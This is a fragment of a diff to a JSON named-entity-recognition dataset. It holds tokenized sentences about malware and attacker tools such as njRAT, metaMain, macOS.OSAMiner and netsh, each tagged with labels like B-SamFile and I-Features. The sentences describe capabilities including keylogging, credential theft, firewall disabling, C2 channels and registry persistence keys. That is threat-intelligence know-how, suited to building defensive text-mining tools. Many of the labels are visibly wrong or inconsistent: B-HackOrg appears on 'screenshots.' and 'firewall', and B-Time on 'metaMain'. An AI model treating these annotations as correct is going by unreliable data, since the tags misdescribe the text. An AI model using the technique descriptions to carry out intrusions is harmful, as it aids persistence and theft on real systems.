"list", + "network", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "can", + "list", + "local", + "services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "the", + "capability", + "to", + "capture", + "video", + "from", + "a", + "webcam." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "been", + "distributed", + "as", + "HTA", + "files", + "with", + "VBScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "has", + "command", + "line", + "access." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "jRAT", + "uses", + "WMIC", + "to", + "identify", + "anti-virus", + "products", + "installed", + "on", + "the", + "victim’s", + "machine", + "and", + "to", + "obtain", + "firewall", + "details." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "used", + "`osascript`", + "to", + "call", + "itself", + "via", + "the", + "`do", + "shell", + "script`", + "command", + "in", + "the", + "Launch", + "Agent", + "`.plist`", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "searched", + "for", + "the", + "Activity", + "Monitor", + "process", + "in", + "the", + "System", + "Events", + "process", + "list", + "and", + "kills", + "the", + "process", + "if", + "running.", + "macOS.OSAMiner", + "also", + "searches", + "the", + "operating", + "system's", + "`install.log`", + "for", + "apps", + "matching", + "its", + "hardcoded", + "list,", + "killing", + "all", + "matching", + "process", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "embedded", + "Stripped", + "Payloads", + "within", + "another", + "run-only", + "Stripped", + "Payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "used", + "`curl`", + "to", + "download", + "a", + "Stripped", + "Payloads", + "from", + "a", + "public", + "facing", + "adversary-controlled", + "webpage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "placed", + "a", + "Stripped", + "Payloads", + "with", + "a", + "`plist`", + "extension", + "in", + "the", + "Launch", + "Agent's", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Exp", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "used", + "`launchctl`", + "to", + "restart", + "the", + "Launch", + "Agent." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "used", + "`ps", + "ax", + "|", + "grep", + "<name>", + "|", + "grep", + "-v", + "grep", + "|", + "...`", + "and", + "`ps", + "ax", + "|", + "grep", + "-E...`", + "to", + "conduct", + "process", + "discovery." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "has", + "used", + "run-only", + "Applescripts,", + "a", + "compiled", + "and", + "stripped", + "version", + "of", + "AppleScript,", + "to", + "remove", + "human", + "readable", + "indicators", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "can", + "parse", + "the", + "output", + "of", + "the", + "native", + "`system_profiler`", + "tool", + "to", + "determine", + "if", + "the", + "machine", + "is", + "running", + "with", + "4", + "cores." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "macOS.OSAMiner", + "can", + "gather", + "the", + "device", + "serial", + "number", + "and", + "has", + "checked", + "to", + "ensure", + "there", + "is", + "enough", + "disk", + "space", + "using", + "the", + "Unix", + "utility", + "`df`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "meek", + "uses", + "Domain", + "Fronting", + "to", + "disguise", + "the", + "destination", + "of", + "network", + "traffic", + "as", + "another", + "server", + "that", + "is", + "hosted", + "in", + "the", + "same", + "Content", + "Delivery", + "Network", + "(CDN)", + "as", + "the", + "intended", + "destination." + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "used", + "XOR-based", + "encryption", + "for", + "collected", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "support", + "an", + "HKCMD", + "sideloading", + "start", + "method." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "collect", + "files", + "and", + "system", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "decrypt", + "and", + "load", + "other", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain's", + "module", + "file", + "has", + "been", + "encrypted", + "via", + "XOR." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "upload", + "collected", + "files", + "and", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "deleted", + "collected", + "items", + "after", + "uploading", + "the", + "content", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "recursively", + "enumerate", + "files", + "in", + "an", + "operator-provided", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "download", + "files", + "onto", + "compromised", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "log", + "mouse", + "events." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "create", + "a", + "named", + "pipe", + "to", + "listen", + "for", + "and", + "send", + "data", + "to", + "a", + "named", + "pipe-based", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "the", + "ability", + "to", + "log", + "keyboard", + "events." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "stored", + "the", + "collected", + "system", + "files", + "in", + "a", + "working", + "directory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "write", + "the", + "process", + "ID", + "of", + "a", + "target", + "process", + "into", + "the", + "`HKEY_LOCAL_MACHINE\\SOFTWARE\\DDE\\tpid`", + "Registry", + "value", + "as", + "part", + "of", + "its", + "reflective", + "loading", + "activity." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "execute", + "an", + "operator-provided", + "Windows", + "command", + "by", + "leveraging", + "functions", + "such", + "as", + "`WinExec`,", + "`WriteFile`,", + "and", + "`ReadFile`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "establish", + "an", + "indirect", + "and", + "raw", + "TCP", + "socket-based", + "connection", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "authenticated", + "itself", + "to", + "a", + "different", + "implant,", + "Cryshell,", + "through", + "a", + "port", + "knocking", + "and", + "handshake", + "procedure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "enumerate", + "the", + "processes", + "that", + "run", + "on", + "the", + "platform." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "inject", + "the", + "loader", + "file,", + "Speech02.db,", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "reflectively", + "loaded", + "a", + "DLL", + "to", + "read,", + "decrypt,", + "and", + "load", + "an", + "orchestrator", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "take", + "and", + "save", + "screenshots." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "encrypt", + "the", + "data", + "that", + "it", + "sends", + "and", + "receives", + "from", + "the", + "C2", + "server", + "using", + "an", + "RC4", + "encryption", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "collect", + "the", + "computer", + "name", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "has", + "delayed", + "execution", + "for", + "five", + "to", + "six", + "minutes", + "during", + "its", + "persistence", + "establishment", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "change", + "the", + "`CreationTime`,", + "`LastAccessTime`,", + "and", + "`LastWriteTime`", + "file", + "time", + "attributes", + "when", + "executed", + "with", + "`SYSTEM`", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "metaMain", + "registered", + "a", + "WMI", + "event", + "subscription", + "consumer", + "called", + "\"hard_disk_stat\"", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "nbtstat", + "can", + "be", + "used", + "to", + "discover", + "local", + "NetBIOS", + "domain", + "names." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "nbtstat", + "can", + "be", + "used", + "to", + "discover", + "current", + "NetBIOS", + "sessions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "netsh", + "can", + "be", + "used", + "to", + "disable", + "local", + "firewall", + "settings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "netsh", + "can", + "be", + "used", + "as", + "a", + "persistence", + "proxy", + "technique", + "to", + "execute", + "a", + "helper", + "DLL", + "when", + "netsh.exe", + "is", + "executed." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "netsh", + "can", + "be", + "used", + "to", + "set", + "up", + "a", + "proxy", + "tunnel", + "to", + "allow", + "remote", + "host", + "access", + "to", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "netsh", + "can", + "be", + "used", + "to", + "discover", + "system", + "firewall", + "settings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "netstat", + "can", + "be", + "used", + "to", + "enumerate", + "local", + "network", + "connections,", + "including", + "active", + "TCP", + "connections", + "and", + "other", + "network", + "statistics." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ngrok", + "can", + "provide", + "DGA", + "for", + "C2", + "servers", + "through", + "the", + "use", + "of", + "random", + "URL", + "strings", + "that", + "change", + "every", + "12", + "hours." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ngrok", + "has", + "been", + "used", + "by", + "threat", + "actors", + "to", + "configure", + "servers", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "ngrok", + "can", + "tunnel", + "RDP", + "and", + "other", + "services", + "securely", + "over", + "internet", + "connections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ngrok", + "can", + "be", + "used", + "to", + "proxy", + "connections", + "to", + "machines", + "located", + "behind", + "NAT", + "or", + "firewalls." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ngrok", + "has", + "been", + "used", + "by", + "threat", + "actors", + "to", + "proxy", + "C2", + "connections", + "to", + "ngrok", + "service", + "subdomains." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "njRAT", + "gathers", + "information", + "about", + "opened", + "windows", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "is", + "capable", + "of", + "manipulating", + "and", + "deleting", + "registry", + "keys,", + "including", + "those", + "used", + "for", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "AutoIt", + "to", + "compile", + "the", + "payload", + "and", + "main", + "script", + "into", + "a", + "single", + "executable", + "after", + "delivery." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "a", + "module", + "that", + "steals", + "passwords", + "saved", + "in", + "victim", + "web", + "browsers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "collect", + "data", + "from", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "modified", + "the", + "Windows", + "firewall", + "to", + "allow", + "itself", + "to", + "communicate", + "through", + "the", + "firewall." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "included", + "a", + "base64", + "encoded", + "executable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "HTTP", + "to", + "receive", + "stolen", + "information", + "from", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "a", + "fast", + "flux", + "DNS", + "for", + "C2", + "IP", + "resolution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "is", + "capable", + "of", + "deleting", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "browse", + "file", + "systems", + "using", + "a", + "file", + "manager", + "module." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "download", + "files", + "to", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "is", + "capable", + "of", + "logging", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "create,", + "delete,", + "or", + "modify", + "a", + "specified", + "Registry", + "key", + "or", + "value." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "the", + "ShellExecute()", + "function", + "within", + "a", + "script." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "port", + "1177", + "for", + "HTTP", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "will", + "attempt", + "to", + "detect", + "if", + "the", + "victim", + "system", + "has", + "a", + "camera", + "during", + "the", + "initial", + "infection.", + "njRAT", + "can", + "also", + "detect", + "any", + "removable", + "drives", + "connected", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "executed", + "PowerShell", + "commands", + "via", + "auto-run", + "registry", + "key", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "search", + "a", + "list", + "of", + "running", + "processes", + "for", + "Tr.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "read", + "specific", + "registry", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "added", + "persistence", + "via", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", + "and", + "dropped", + "a", + "shortcut", + "in", + "<code>%STARTUP%</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "a", + "module", + "for", + "performing", + "remote", + "desktop", + "access." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "identify", + "remote", + "hosts", + "on", + "connected", + "networks." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "be", + "configured", + "to", + "spread", + "via", + "removable", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "uses", + "Base64", + "encoding", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "enumerates", + "the", + "victim", + "operating", + "system", + "and", + "computer", + "name", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "enumerates", + "the", + "current", + "user", + "during", + "the", + "initial", + "infection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "access", + "the", + "victim's", + "webcam." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "njRAT", + "can", + "launch", + "a", + "command", + "shell", + "interface", + "for", + "executing", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "an", + "initial", + "connectivity", + "check", + "fails,", + "pngdowner", + "attempts", + "to", + "extract", + "proxy", + "details", + "and", + "credentials", + "from", + "Windows", + "Protected", + "Storage", + "and", + "from", + "the", + "IE", + "Credentials", + "Store.", + "This", + "allows", + "the", + "adversary", + "to", + "use", + "the", + "proxy", + "credentials", + "for", + "subsequent", + "requests", + "if", + "they", + "enable", + "outbound", + "HTTP", + "access." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "pngdowner", + "deletes", + "content", + "from", + "C2", + "communications", + "that", + "was", + "saved", + "to", + "the", + "user's", + "temporary", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "pngdowner", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "pwdump", + "can", + "be", + "used", + "to", + "dump", + "credentials", + "from", + "the", + "SAM." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "route", + "can", + "be", + "used", + "to", + "discover", + "routing", + "configuration", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "schtasks", + "is", + "used", + "to", + "schedule", + "tasks", + "on", + "a", + "Windows", + "system", + "to", + "run", + "at", + "a", + "specific", + "date", + "and", + "time." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spwebmember", + "is", + "used", + "to", + "enumerate", + "and", + "dump", + "information", + "from", + "Microsoft", + "SharePoint." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sqlmap", + "can", + "be", + "used", + "to", + "automate", + "exploitation", + "of", + "SQL", + "injection", + "vulnerabilities." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Way", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "added", + "persistence", + "via", + "the", + "Registry", + "key", + "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Windows\\load</code>", + "which", + "causes", + "the", + "malware", + "to", + "run", + "each", + "time", + "any", + "user", + "logs", + "in." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "xCaon", + "has", + "uploaded", + "files", + "from", + "victims'", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", 